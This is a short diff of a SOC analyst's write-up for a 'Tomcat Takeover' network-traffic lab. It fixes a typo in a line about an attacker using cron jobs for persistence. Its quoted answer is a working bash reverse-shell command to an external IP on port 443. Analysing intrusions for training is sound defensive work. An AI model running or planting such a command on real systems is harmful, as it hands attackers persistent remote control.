keval-sondigara/SOC-Analyst-Portfolio/Network Traffic Analysis/Tomcat Takeover Lab/writeup.md

 ![answer](Q8.png)

-We can see that attacker use cron jobs to maintaine persistence.
+We can see that attacker use cron jobs to maintain persistence.

 ### Answer:- /bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'